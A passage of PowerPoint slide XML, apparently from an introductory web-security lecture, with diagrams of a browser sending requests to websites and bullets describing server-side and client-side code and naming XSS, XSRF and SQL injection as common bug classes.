                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DC28DF3-3A55-5C4D-B3BF-06F78D653C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15374" y="2353146"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD723D5-BDAF-9948-8F7D-58A5D241CD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18809" y="3564113"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E964124-7954-B34B-A02D-97227FE38610}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3679369" y="3756562"/>
            <a:ext cx="3284083" cy="50525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2712"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2712"/>
              <a:gd name="T13" fmla="*/ 0 h 287"/>
              <a:gd name="T14" fmla="*/ 2712 w 2712"/>
              <a:gd name="T15" fmla="*/ 287 h 287"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 3155 h 3384"/>
              <a:gd name="connsiteX1" fmla="*/ 1504 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 3364 h 3384"/>
              <a:gd name="connsiteX2" fmla="*/ 4828 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 2570 h 3384"/>
              <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY3" fmla="*/ 228 h 3384"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 7628"/>
              <a:gd name="connsiteY0" fmla="*/ 2598 h 3277"/>
              <a:gd name="connsiteX1" fmla="*/ 1504 w 7628"/>
              <a:gd name="connsiteY1" fmla="*/ 3216 h 3277"/>
              <a:gd name="connsiteX2" fmla="*/ 4828 w 7628"/>
              <a:gd name="connsiteY2" fmla="*/ 870 h 3277"/>
              <a:gd name="connsiteX3" fmla="*/ 7628 w 7628"/>
              <a:gd name="connsiteY3" fmla="*/ 2845 h 3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628" h="3277">
                <a:moveTo>
                  <a:pt x="0" y="2598"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="251" y="2702"/>
                  <a:pt x="699" y="3503"/>
                  <a:pt x="1504" y="3216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2309" y="2929"/>
                  <a:pt x="3412" y="2412"/>
                  <a:pt x="4828" y="870"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6244" y="-676"/>
                  <a:pt x="6684" y="-243"/>
                  <a:pt x="7628" y="2845"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"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" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15E74445-ED3C-6B48-9DD3-741F7D83BE59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3544333" y="2513667"/>
            <a:ext cx="3634534" cy="659049"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2712"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2712"/>
              <a:gd name="T13" fmla="*/ 0 h 287"/>
              <a:gd name="T14" fmla="*/ 2712 w 2712"/>
              <a:gd name="T15" fmla="*/ 287 h 287"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8442"/>
              <a:gd name="connsiteY0" fmla="*/ 14407 h 15161"/>
              <a:gd name="connsiteX1" fmla="*/ 1504 w 8442"/>
              <a:gd name="connsiteY1" fmla="*/ 14616 h 15161"/>
              <a:gd name="connsiteX2" fmla="*/ 5465 w 8442"/>
              <a:gd name="connsiteY2" fmla="*/ 6463 h 15161"/>
              <a:gd name="connsiteX3" fmla="*/ 8442 w 8442"/>
              <a:gd name="connsiteY3" fmla="*/ 107 h 15161"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 9528 h 10123"/>
              <a:gd name="connsiteX1" fmla="*/ 1782 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 9666 h 10123"/>
              <a:gd name="connsiteX2" fmla="*/ 5887 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 2964 h 10123"/>
              <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY3" fmla="*/ 96 h 10123"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 9528 h 9541"/>
              <a:gd name="connsiteX1" fmla="*/ 2243 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 8563 h 9541"/>
              <a:gd name="connsiteX2" fmla="*/ 5887 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 2964 h 9541"/>
              <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY3" fmla="*/ 96 h 9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00" h="9541">
                <a:moveTo>
                  <a:pt x="0" y="9528"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="297" y="9551"/>
                  <a:pt x="1262" y="9657"/>
                  <a:pt x="2243" y="8563"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3224" y="7469"/>
                  <a:pt x="4209" y="3308"/>
                  <a:pt x="5887" y="2964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7564" y="2619"/>
                  <a:pt x="8882" y="-594"/>
                  <a:pt x="10000" y="96"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"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" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA9E53F-2DE1-4744-A5F0-D9D488F668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68461" y="2019770"/>
            <a:ext cx="10953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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDA67CFC-E088-AA40-9C86-3C4CDBFF99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20773" y="3890931"/>
            <a:ext cx="10953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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1862898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loud 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F9EBB97-3968-044C-B844-A24E6E305FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773055" y="1443147"/>
            <a:ext cx="5407479" cy="3771900"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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87" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624310FE-A614-B043-94B1-00E452AD74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21970" y="2777441"/>
            <a:ext cx="1905000" cy="1103312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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="24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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5252C2A3-4FB2-0D46-94FA-F17027B9824C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3526971" y="2956828"/>
            <a:ext cx="4314825" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2718"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2718"/>
              <a:gd name="T13" fmla="*/ 0 h 253"/>
              <a:gd name="T14" fmla="*/ 2718 w 2718"/>
              <a:gd name="T15" fmla="*/ 253 h 25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718" h="253">
                <a:moveTo>
                  <a:pt x="0" y="216"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="216"/>
                  <a:pt x="146" y="253"/>
                  <a:pt x="408" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="670" y="181"/>
                  <a:pt x="1187" y="2"/>
                  <a:pt x="1572" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1957" y="0"/>
                  <a:pt x="2479" y="167"/>
                  <a:pt x="2718" y="211"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink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391" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A08260A-9FFE-784C-ABB2-E0EE4C9EAB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29096" y="3214004"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16394" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A64ED3-DD56-FB4E-AE84-C71A0B5D5A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13196" y="2798079"/>
            <a:ext cx="10953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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>website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281728A-C6D7-7246-88EE-C2118FCC5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Server’s View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5DDA0AD-7852-F14B-B6AC-14A56F41B45A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5428794" y="3974778"/>
            <a:ext cx="6096000" cy="240065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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Web applications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Online merchants, banks, Google Apps … Zoom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Mix of server-side and client-side code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rgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Server-side code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>written in PHP, Ruby, ASP, JSP… runs on the Web server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rgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Client-side code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>written in JavaScript… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>     runs in the Web browser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Many potential bugs: XSS, XSRF, SQL injection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92E33E1-8455-3D43-AA4A-F101B71C2846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066142" y="4120780"/>
            <a:ext cx="40190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  <a:latin typeface="Segoe Print" panose="02000800000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Potentially malicious!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3BD6321-4652-434A-BBCE-65EE4695830C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3965880" y="3424080"/>
            <a:ext cx="422280" cy="554040"/>
            <a:chOff x="3965880" y="3424080"/>
            <a:chExt cx="422280" cy="554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3177E72C-D675-2642-966B-D7DA4C48EF72}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3965880" y="3441720"/>
                <a:ext cx="279000" cy="53640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3177E72C-D675-2642-966B-D7DA4C48EF72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929880" y="3405720"/>
                  <a:ext cx="350640" cy="60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2DAA84DD-5FA6-D949-A5B8-F238DAB8B90F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4233000" y="3424080"/>
                <a:ext cx="155160" cy="2167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2DAA84DD-5FA6-D949-A5B8-F238DAB8B90F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197360" y="3388440"/>
                  <a:ext cx="226800" cy="2883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8533169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loud 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F9EBB97-3968-044C-B844-A24E6E305FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773055" y="1443147"/>
            <a:ext cx="5407479" cy="3771900"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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87" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624310FE-A614-B043-94B1-00E452AD74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21970" y="2777441"/>
            <a:ext cx="1905000" cy="1103312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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5252C2A3-4FB2-0D46-94FA-F17027B9824C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3526971" y="2956828"/>
            <a:ext cx="4314825" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2718"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2718"/>
              <a:gd name="T13" fmla="*/ 0 h 253"/>
              <a:gd name="T14" fmla="*/ 2718 w 2718"/>
              <a:gd name="T15" fmla="*/ 253 h 25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718" h="253">
                <a:moveTo>
                  <a:pt x="0" y="216"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="216"/>
                  <a:pt x="146" y="253"/>
                  <a:pt x="408" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="670" y="181"/>
                  <a:pt x="1187" y="2"/>
                  <a:pt x="1572" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1957" y="0"/>
                  <a:pt x="2479" y="167"/>
                  <a:pt x="2718" y="211"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink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391" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A08260A-9FFE-784C-ABB2-E0EE4C9EAB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29096" y="3214004"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16392" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D41CC6B3-1485-474A-886E-DB43188A01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21970" y="3880753"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16393" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{381A867E-90CA-9147-89E8-0C37607235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21970" y="4337953"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Hardware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16394" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A64ED3-DD56-FB4E-AE84-C71A0B5D5A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13196" y="2798079"/>
            <a:ext cx="10953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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16395" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{909D8D88-4A65-C741-A507-767A33812AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3526970" y="3258454"/>
            <a:ext cx="4305300" cy="455613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2712"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2712"/>
              <a:gd name="T13" fmla="*/ 0 h 287"/>
              <a:gd name="T14" fmla="*/ 2712 w 2712"/>
              <a:gd name="T15" fmla="*/ 287 h 28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712" h="287">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="244"/>
                  <a:pt x="161" y="287"/>
                  <a:pt x="408" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="655" y="211"/>
                  <a:pt x="1098" y="30"/>
                  <a:pt x="1482" y="15"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1866" y="0"/>
                  <a:pt x="2456" y="129"/>
                  <a:pt x="2712" y="159"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"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396" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A45613-34A7-6646-BAAE-9B343E16E6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61970" y="2701242"/>
            <a:ext cx="10223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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16397" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4ED96F-F240-B944-82EF-DBCBA73308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35361" y="3544203"/>
